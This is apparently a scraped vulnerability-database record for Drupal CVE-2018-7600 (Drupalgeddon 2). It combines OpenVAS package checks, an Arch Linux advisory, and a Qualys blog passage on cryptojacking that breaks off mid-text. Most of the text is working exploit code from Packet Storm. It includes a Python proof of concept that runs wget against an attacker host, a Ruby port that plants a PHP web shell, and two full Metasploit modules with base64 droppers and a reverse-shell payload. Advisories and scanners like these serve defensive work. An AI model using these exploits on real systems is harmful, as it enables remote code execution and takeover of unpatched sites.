rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.15~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-922cc2fbaa", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6924", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6923", "CVE-2017-6920", "CVE-2017-6929", "CVE-2017-6921", "CVE-2017-6930", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6925"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874383", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_922cc2fbaa_drupal8_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874383\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:34 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6923\", \"CVE-2017-6924\", \"CVE-2017-6925\",\n \"CVE-2017-6920\", \"CVE-2017-6921\", \"CVE-2017-6922\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.3.9~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:04", "description": "Arch Linux Security Advisory ASA-201804-1\n=========================================\n\nSeverity: Critical\nDate : 2018-04-01\nCVE-ID : CVE-2018-7600\nPackage : drupal\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-665\n\nSummary\n=======\n\nThe package drupal before version 8.5.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 8.5.1-1.\n\n# pacman -Syu \"drupal>=8.5.1-1\"\n\nThe problem has been fixed upstream in version 8.5.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA remote code execution vulnerability exists within multiple subsystems\nof Drupal 7.x and 8.x. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being completely compromised.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code by performing a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://www.drupal.org/sa-core-2018-002\nhttps://www.tenable.com/blog/critical-drupal-core-vulnerability-what-you-need-to-know\nhttps://github.com/drupal/drupal/commit/5ac8738fa69df34a0635f0907d661b509ff9a28f\nhttps://security.archlinux.org/CVE-2018-7600", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-01T00:00:00", "type": "archlinux", "title": "[ASA-201804-1] drupal: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-01T00:00:00", "id": "ASA-201804-1", "href": "https://security.archlinux.org/ASA-201804-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-04-14T02:40:10", "description": "", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "packetstorm", "title": "Drupal Drupalgeddon2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "PACKETSTORM:147181", "href": "https://packetstormsecurity.com/files/147181/Drupal-Drupalgeddon2-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env \nimport sys \nimport requests \n \nprint ('################################################################') \nprint ('# Proof-Of-Concept for CVE-2018-7600') \nprint ('# by Vitalii Rudnykh') \nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \nprint ('# https://github.com/a2u/CVE-2018-7600') \nprint ('################################################################') \nprint ('Provided only for educational or information purposes\\n') \n \ntarget = raw_input('Enter target url (example: https://domain.ltd/): ') \n \nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \n \nr = requests.post(url, data=payload) \nif r.status_code != 200: \nsys.exit(\"Not exploitable\") \nprint ('\\nCheck: '+target+'hello.txt') \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147181/drupalgeddon2poc-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-27T01:05:58", "description": "", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "packetstorm", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "PACKETSTORM:147392", "href": "https://packetstormsecurity.com/files/147392/Drupal-Drupalgeddon-2-Forms-API-Property-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# XXX: CmdStager can't handle badchars \ninclude Msf::Exploit::PhpEXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection', \n'Description' => %q{ \nThis module exploits a Drupal property injection in the Forms API. \n \nDrupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. \n}, \n'Author' => [ \n'Jasper Mattsson', # Vulnerability discovery \n'a2u', # Proof of concept (Drupal 8.x) \n'Nixawk', # Proof of concept (Drupal 8.x) \n'FireFart', # Proof of concept (Drupal 7.x) \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2018-7600'], \n['URL', 'https://www.drupal.org/sa-core-2018-002'], \n['URL', 'https://greysec.net/showthread.php?tid=2912'], \n['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], \n['URL', 'https://github.com/a2u/CVE-2018-7600'], \n['URL', 'https://github.com/nixawk/labs/issues/19'], \n['URL', 'https://github.com/FireFart/CVE-2018-7600'], \n['AKA', 'SA-CORE-2018-002'], \n['AKA', 'Drupalgeddon 2'] \n], \n'DisclosureDate' => 'Mar 28 2018', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'linux'], \n'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Payload' => {'BadChars' => '&>\\''}, \n# XXX: Using \"x\" in Gem::Version::new isn't technically appropriate \n'Targets' => [ \n# \n# Automatic targets (PHP, cmd/unix, native) \n# \n['Automatic (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php_memory \n], \n['Automatic (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php_dropper \n], \n['Automatic (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory \n], \n['Automatic (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n], \n# \n# Drupal 7.x targets (PHP, cmd/unix, native) \n# \n['Drupal 7.x (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :php_memory \n], \n['Drupal 7.x (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :php_dropper \n], \n['Drupal 7.x (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :unix_memory \n], \n['Drupal 7.x (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Version' => Gem::Version.new('7.x'), \n'Type' => :linux_dropper \n], \n# \n# Drupal 8.x targets (PHP, cmd/unix, native) \n# \n['Drupal 8.x (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :php_memory \n], \n['Drupal 8.x (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :php_dropper \n], \n['Drupal 8.x (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :unix_memory \n], \n['Drupal 8.x (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Version' => Gem::Version.new('8.x'), \n'Type' => :linux_dropper \n] \n], \n'DefaultTarget' => 0, # Automatic (PHP In-Memory) \n'DefaultOptions' => {'WfsDelay' => 2} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path to Drupal install', '/']), \nOptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']), \nOptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false]) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp']) \n]) \nend \n \ndef check \ncheckcode = CheckCode::Safe \n \nif drupal_version \nprint_status(\"Drupal #{@version} targeted at #{full_uri}\") \ncheckcode = CheckCode::Detected \nelse \nprint_error('Could not determine Drupal version to target') \nreturn CheckCode::Unknown \nend \n \nif drupal_unpatched? \nprint_good('Drupal appears unpatched in CHANGELOG.txt') \ncheckcode = CheckCode::Appears \nend \n \ntoken = random_crap \nres = execute_command(token, func: 'printf') \n \nif res && res.body.start_with?(token) \ncheckcode = CheckCode::Vulnerable \nend \n \ncheckcode \nend \n \ndef exploit \nunless check == CheckCode::Vulnerable || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Set ForceExploit to override') \nend \n \nif datastore['PAYLOAD'] == 'cmd/unix/generic' \nprint_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') \n# XXX: Naughty datastore modification \ndatastore['DUMP_OUTPUT'] = true \nend \n \n# NOTE: assert() is attempted first, then PHP_FUNC if that fails \ncase target['Type'] \nwhen :php_memory \nexecute_command(payload.encoded, func: 'assert') \n \nsleep(wfs_delay) \nreturn if session_created? \n \n# XXX: This will spawn a *very* obvious process \nexecute_command(\"php -r '#{payload.encoded}'\") \nwhen :unix_memory \nexecute_command(payload.encoded) \nwhen :php_dropper, :linux_dropper \ndropper_assert \n \nsleep(wfs_delay) \nreturn if session_created? \n \ndropper_exec \nend \nend \n \ndef dropper_assert \nphp_file = Pathname.new( \n\"#{datastore['WritableDir']}/#{random_crap}.php\" \n).cleanpath \n \n# Return the PHP payload or a PHP binary dropper \ndropper = get_write_exec_payload( \nwritable_path: datastore['WritableDir'], \nunlink_self: true # Worth a shot \n) \n \n# Encode away potential badchars with Base64 \ndropper = Rex::Text.encode_base64(dropper) \n \n# Stage 1 decodes the PHP and writes it to disk \nstage1 = %Q{ \nfile_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\")); \n} \n \n# Stage 2 executes said PHP in-process \nstage2 = %Q{ \ninclude_once(\"#{php_file}\"); \n} \n \n# :unlink_self may not work, so let's make sure \nregister_file_for_cleanup(php_file) \n \n# Hopefully pop our shell with assert() \nexecute_command(stage1.strip, func: 'assert') \nexecute_command(stage2.strip, func: 'assert') \nend \n \ndef dropper_exec \nphp_file = \"#{random_crap}.php\" \ntmp_file = Pathname.new( \n\"#{datastore['WritableDir']}/#{php_file}\" \n).cleanpath \n \n# Return the PHP payload or a PHP binary dropper \ndropper = get_write_exec_payload( \nwritable_path: datastore['WritableDir'], \nunlink_self: true # Worth a shot \n) \n \n# Encode away potential badchars with Base64 \ndropper = Rex::Text.encode_base64(dropper) \n \n# :unlink_self may not work, so let's make sure \nregister_file_for_cleanup(php_file) \n \n# Write the payload or dropper to disk (!) \n# NOTE: Analysis indicates > is a badchar for 8.x \nexecute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\") \n \n# Attempt in-process execution of our PHP script \nsend_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, php_file) \n) \n \nsleep(wfs_delay) \nreturn if session_created? \n \n# Try to get a shell with PHP CLI \nexecute_command(\"php #{php_file}\") \n \nsleep(wfs_delay) \nreturn if session_created? \n \nregister_file_for_cleanup(tmp_file) \n \n# Fall back on our temp file \nexecute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\") \nexecute_command(\"php #{tmp_file}\") \nend \n \ndef execute_command(cmd, opts = {}) \nfunc = opts[:func] || datastore['PHP_FUNC'] || 'passthru' \n \nvprint_status(\"Executing with #{func}(): #{cmd}\") \n \nres = \ncase @version.to_s \nwhen '7.x' \nexploit_drupal7(func, cmd) \nwhen '8.x' \nexploit_drupal8(func, cmd) \nend \n \nif res && res.code != 200 \nprint_error(\"Unexpected reply: #{res.inspect}\") \nreturn \nend \n \nif res && datastore['DUMP_OUTPUT'] \nprint_line(res.body) \nend \n \nres \nend \n \ndef drupal_version \nif target['Version'] \n@version = target['Version'] \nreturn @version \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => target_uri.path \n) \n \nreturn unless res && res.code == 200 \n \n# Check for an X-Generator header \n@version = \ncase res.headers['X-Generator'] \nwhen /Drupal 7/ \nGem::Version.new('7.x') \nwhen /Drupal 8/ \nGem::Version.new('8.x') \nend \n \nreturn @version if @version \n \n# Check for a <meta> tag \ngenerator = res.get_html_document.at( \n'//meta[@name = \"Generator\"]/@content' \n) \n \nreturn unless generator \n \n@version = \ncase generator.value \nwhen /Drupal 7/ \nGem::Version.new('7.x') \nwhen /Drupal 8/ \nGem::Version.new('8.x') \nend \nend \n \ndef drupal_unpatched? \nunpatched = true \n \n# Check for patch level in CHANGELOG.txt \nuri = \ncase @version.to_s \nwhen '7.x' \nnormalize_uri(target_uri.path, 'CHANGELOG.txt') \nwhen '8.x' \nnormalize_uri(target_uri.path, 'core/CHANGELOG.txt') \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => uri \n) \n \nreturn unless res && res.code == 200 \n \nif res.body.include?('SA-CORE-2018-002') \nunpatched = false \nend \n \nunpatched \nend \n \ndef exploit_drupal7(func, code) \nvars_get = { \n'q' => 'user/password', \n'name[#post_render][]' => func, \n'name[#markup]' => code, \n'name[#type]' => 'markup' \n} \n \nvars_post = { \n'form_id' => 'user_pass', \n'_triggering_element_name' => 'name' \n} \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \n \nreturn res unless res && res.code == 200 \n \nform_build_id = res.get_html_document.at( \n'//input[@name = \"form_build_id\"]/@value' \n) \n \nreturn res unless form_build_id \n \nvars_get = { \n'q' => \"file/ajax/name/#value/#{form_build_id.value}\" \n} \n \nvars_post = { \n'form_build_id' => form_build_id.value \n} \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \nend \n \ndef exploit_drupal8(func, code) \n# Clean URLs are enabled by default and \"can't\" be disabled \nuri = normalize_uri(target_uri.path, 'user/register') \n \nvars_get = { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => 1, \n'_wrapper_format' => 'drupal_ajax' \n} \n \nvars_post = { \n'form_id' => 'user_register_form', \n'_drupal_ajax' => 1, \n'mail[#type]' => 'markup', \n'mail[#post_render][]' => func, \n'mail[#markup]' => code \n} \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \nend \n \ndef random_crap \nRex::Text.rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147392/drupal_drupalgeddon2.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-14T02:40:10", "description": "", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "packetstorm", "title": "Drupal Drupalgeddon2 Remote Code Execution Ruby Port", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "PACKETSTORM:147182", "href": "https://packetstormsecurity.com/files/147182/Drupal-Drupalgeddon2-Remote-Code-Execution-Ruby-Port.html", "sourceData": "`require 'net/http' \n \n# Hans Topo ruby port from Drupalggedon2 exploit. \n# Based on Vitalii Rudnykh exploit \n \ntarget = ARGV[0] \ncommand = ARGV[1] \n \nurl = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \n \nshell = \"<?php system($_GET['cmd']); ?>\" \n \npayload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \n \nuri = URI(url) \n \nhttp = Net::HTTP.new(uri.host,uri.port) \n \nif uri.scheme == 'https' \nhttp.use_ssl = true \nhttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \nend \n \nreq = Net::HTTP::Post.new(uri.path) \nreq.body = payload \n \nresponse = http.request(req) \n \nif response.code != \"200\" \nputs \"[*] Response: \" + response.code \nputs \"[*] Target seems not to be exploitable\" \nexit \nend \n \nputs \"[*] Target seems to be exploitable.\" \n \nexploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \nresponse = Net::HTTP.get_response(exploit_uri) \nputs response.body \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147182/drupalgeddon2poc2-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-19T09:07:42", "description": "", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "packetstorm", "title": "Drupalgeddon2 Drupal Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "PACKETSTORM:147247", "href": "https://packetstormsecurity.com/files/147247/Drupalgeddon2-Drupal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon2', \n'Description' => %q{ \nCVE-2018-7600 / SA-CORE-2018-002 \nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 \nallows remote attackers to execute arbitrary code because of an issue affecting \nmultiple subsystems with default or common module configurations. \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. \n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Vitalii Rudnykh', # initial PoC \n'Hans Topo', # further research and ruby port \n'JosA(c) Ignacio Rojo' # further research and msf module \n], \n'References' => \n[ \n['SA-CORE', '2018-002'], \n['CVE', '2018-7600'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], \n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 15 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef exploit_user_register \ndata = Rex::MIME::Message.new \ndata.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"') \ndata.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"') \ndata.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"') \ndata.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"') \npost_data = data.to_s \n \n# /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri_path}user/register\", \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'vars_get' => { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => '1', \n'_wrapper_format' => 'drupal_ajax', \n} \n}) \nend \n \n## \n# Main \n## \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nexploit_user_register \nelse \nfail_with(Failure::BadConfig, \"Invalid target selected.\") \nend \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147247/drupalgeddon2-exec.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "[](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>)Qualys Malware Research Labs is announcing the release of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension to detect and block browser-based cryptocurrency mining, aka _cryptojacking_.\n\n### Cryptojacking\n\nCryptojacking attacks leverage the victim system\u2019s resources via malicious JavaScript to mine certain cryptocurrencies. Attackers carry out these attacks by infecting popular sites with JavaScript that enables cryptojacking. Any visitor to such sites will download the JavaScript and unknowingly contribute its system resources to mine a cryptocurrency that is added to the attacker\u2019s wallet. The resource-intensive mining process is carried out on victim systems typically consumes more than 70% of CPU, that reduces system performance, increases power consumption and can cause possible permanent damage to the system.\n\nBecause cryptojacking helps attackers earn cryptocurrency without spending a dime on mining infrastructure, it is very profitable. The overall cryptocurrency market capitalization has reached more than $270 billion as of July 2018 with more than 1700 active projects! There is a lot of money to be made for attackers leveraging these projects, and cryptomining is gradually moving to the center stage of threat landscape as an even more attractive option compared to the recent favorite ransomware campaigns.\n\nCryptojacking has also gone mainstream recently because it is safer for cyber criminals and webmasters than ransomware, which requires interaction with the victim to collect payment. And because cryptojacking is browser based, it is easier to infect victims than hacking into servers. As cryptomining becomes more resource-intensive over time in terms of compute power and electricity consumption required, stealing those resources is becoming more enticing to attackers.\n\n### Cryptojacking and Monero\n\n[Monero (XMR)](<https://en.wikipedia.org/wiki/Monero_\\(cryptocurrency\\)>), a relatively new cryptocurrency, is becoming a more common target of cryptojacking attackers because its mining algorithm ([CryptoNight](<https://en.wikipedia.org/wiki/CryptoNote#Egalitarian_proof_of_work>)) is designed for easy integration and because its privacy and anonymity features also benefit hackers. Monero\u2019s proof-of-work mining algorithm can be used with desktop- or server-grade CPUs rather than custom-built specialized ASIC or GPU hardware that is required for traditional coin mining algorithms. This is an important aspect of new generation cryptocurrency, as it tries to be decentralized and avoid enabling a small set of users with access to specialized hardware from creating a mining monopoly. From an attacker\u2019s standpoint, the possibility of making sizable profits off desktop-grade CPUs with added privacy is a lucrative option.\n\nA popular technology used in most browser based cryptocurrency mining algorithms is WASM, short for WebAssembly. It is a binary executable format for the web that makes JavaScript execution within the browser quite efficient.\n\n\n\n_Fig. 1 CryptoNight based cryptocurrencies market capitalization, June 2018. Source: <https://coinmarketcap.com>_\n\n \n\n### Infections\n\nThe security research blog [Bad Packet Reports](<https://badpackets.net/>) recently published an [article](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) that stated the presence of more than 100,000 sites that are currently infected with cryptojacking malware. Most of these sites seem to be compromised using an exploit for the [Drupalgeddon 2](<https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql>). The attack exploits the vulnerability [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>), even after the [patch](<https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch>) has been available for several months already. [Side note: Always patch regularly!] There are reports of malware campaigns leveraging a recently released exploit for this vulnerability to compromise victims and inject coin mining scripts. Once a user visits these compromised sites, their system unwittingly contributes towards solving a crypto puzzle that benefits attackers.\n\nTo protect users from their computing resources being drained via unauthorized coin mining scripts running on your machine, one needs to block access to the following popular coin mining services:\n\n * coinhive[.]com\n * load[.]jsecoin[.]com\n * crypto-loot[.]com\n * coin-have[.]com\n * ppoi[.]org\n * cryptoloot[.]pro\n * papoto[.]com\n * coinlab[.]biz\n\n### Qualys BrowserCheck CoinBlocker Extension for Google Chrome\n\nBased on extensive research from Qualys Malware Research Labs, we are announcing [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>), a new Google Chrome browser extension to protect users from browser-based coin mining attacks.\n\nHere are a few screenshots of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) in action:\n\n \n\n\n\n_Fig. 2 Qualys BrowserCheck CoinBlocker_\n\n \n\n\n\n_Fig. 3 Qualys 